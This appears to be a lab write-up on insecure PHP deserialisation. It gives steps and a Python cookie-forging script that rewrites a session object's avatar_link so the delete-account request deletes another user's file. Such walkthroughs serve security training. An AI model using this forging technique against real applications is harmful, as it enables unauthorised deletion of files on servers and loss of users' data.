Using application functionality to exploit insecure deserialisation

Description

This lab uses a serialisation-based session mechanism: the session cookie carries a serialised object describing the logged-in user. The delete-account feature calls a dangerous file-deletion method on a path taken from that object (its avatar_link attribute), so anyone who can edit the cookie can choose which file is deleted.

Reproduction

  1. Log in as wiener:peter. On the My account page, there is an option to delete the account, which sends a POST request to /my-account/delete.

  2. Intercept the request.

  3. Select the session cookie and study its decoded value in the Inspector panel. The serialised object has an avatar_link attribute, which contains the file path to your avatar.

  4. Edit the serialised data so that avatar_link points to /home/carlos/morale.txt, and update the string's length indicator to match (the new path is 23 bytes; PHP's unserialize() trusts the prefix, so a stale length makes the object fail to parse). The modified attribute looks like this:

s:11:"avatar_link";s:23:"/home/carlos/morale.txt"
  5. Click Apply changes. The modified object will automatically be re-encoded and updated in the request.

  6. Forward the request. Your account will be deleted, along with Carlos's morale.txt file.
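The edit in steps 3 to 5 can also be scripted, which is useful when the cookie has to be rebuilt several times. The Python below is an added example, not code from the lab or from Burp: it decodes the cookie, parses the PHP serialised object, replaces avatar_link and re-serialises, recomputing every string length prefix in bytes. The sample object (class name User, property names username and avatar_link, the avatar path) is constructed for illustration and is only assumed to match the lab's cookie in shape.

```python
import base64
import urllib.parse
from dataclasses import dataclass, field

# Constructed sample: a PHP-serialised User object of the shape the lab's session
# cookie holds. Class name, property names and avatar path are assumptions.
SAMPLE_OBJECT = (
    b'O:4:"User":2:{s:8:"username";s:6:"wiener";'
    b's:11:"avatar_link";s:19:"users/wiener/avatar";}'
)


@dataclass
class PHPObject:
    cls: str
    props: dict = field(default_factory=dict)


def _parse_members(d: bytes, i: int, count: int):
    """Parse `count` key/value pairs followed by the closing '}'."""
    out = {}
    for _ in range(count):
        k, i = _parse(d, i)
        v, i = _parse(d, i)
        out[k] = v
    if d[i:i + 1] != b"}":
        raise ValueError(f"expected '}}' at offset {i}")
    return out, i + 1


def _parse(d: bytes, i: int):
    """Return (value, offset after the value) for the item starting at d[i]."""
    t = chr(d[i])
    if t == "N":                                   # N;
        return None, i + 2
    if t in "bid":                                 # b:1;  i:42;  d:1.5;
        end = d.index(b";", i)
        raw = d[i + 2:end].decode()
        return {"b": lambda r: bool(int(r)), "i": int, "d": float}[t](raw), end + 1
    if t == "s":                                   # s:<byte length>:"...";
        colon = d.index(b":", i + 2)
        n = int(d[i + 2:colon])
        start = colon + 2                          # skip ':"'
        # unserialize() trusts the prefix; a stale length after a hand edit is
        # the classic mistake, so reject it here rather than mis-parse.
        if d[start + n:start + n + 2] != b'";':
            raise ValueError(f"length prefix {n} does not match string at {start}")
        return d[start:start + n].decode("utf-8"), start + n + 2
    if t == "a":                                   # a:<count>:{...}
        colon = d.index(b":", i + 2)
        return _parse_members(d, colon + 2, int(d[i + 2:colon]))
    if t == "O":                                   # O:<len>:"Class":<count>:{...}
        colon = d.index(b":", i + 2)
        n = int(d[i + 2:colon])
        name = d[colon + 2:colon + 2 + n].decode()
        i = colon + 2 + n + 2                      # skip '":'
        colon = d.index(b":", i)
        props, end = _parse_members(d, colon + 2, int(d[i:colon]))
        return PHPObject(name, props), end
    raise ValueError(f"unsupported type {t!r} at offset {i}")


def php_unserialize(data: bytes):
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing bytes after serialised value")
    return value


def php_serialize(v) -> bytes:
    """Inverse of php_unserialize(); string lengths are recomputed in bytes."""
    if v is None:
        return b"N;"
    if isinstance(v, bool):
        return b"b:%d;" % int(v)
    if isinstance(v, int):
        return b"i:%d;" % v
    if isinstance(v, float):
        return b"d:%s;" % repr(v).encode()
    if isinstance(v, str):
        raw = v.encode("utf-8")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(v, dict):
        body = b"".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return b"a:%d:{%s}" % (len(v), body)
    if isinstance(v, PHPObject):
        name = v.cls.encode()
        body = b"".join(php_serialize(k) + php_serialize(x) for k, x in v.props.items())
        return b'O:%d:"%s":%d:{%s}' % (len(name), name, len(v.props), body)
    raise TypeError(f"cannot serialise {type(v).__name__}")


def decode_cookie(cookie: str) -> bytes:
    """Cookie value -> raw serialised bytes (URL-decode, then base64-decode)."""
    return base64.b64decode(urllib.parse.unquote(cookie))


def encode_cookie(raw: bytes) -> str:
    return urllib.parse.quote(base64.b64encode(raw).decode(), safe="")


def forge_cookie(cookie: str, avatar_link: str) -> str:
    """Point avatar_link at the file the delete-account handler should remove."""
    user = php_unserialize(decode_cookie(cookie))
    if not isinstance(user, PHPObject) or "avatar_link" not in user.props:
        raise ValueError("cookie does not carry an object with avatar_link")
    user.props["avatar_link"] = avatar_link
    return encode_cookie(php_serialize(user))


if __name__ == "__main__":
    forged = forge_cookie(encode_cookie(SAMPLE_OBJECT), "/home/carlos/morale.txt")
    print(decode_cookie(forged).decode())
```

Run it against the real cookie by passing the session value copied from the intercepted request to forge_cookie() and pasting the result back into the Cookie header of the POST to /my-account/delete. The parser deliberately refuses a string whose length prefix disagrees with its contents, so it also catches the stale-length mistake from step 4 before the request is sent.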

Exploitability

An attacker needs a valid account (wiener:peter here). They edit the serialised object in the session cookie so that avatar_link points at /home/carlos/morale.txt, fix the length prefix, and submit the delete-account request; the application deletes that file along with the account. As the steps above show, nothing protects the cookie's integrity, so the edited object is accepted as-is.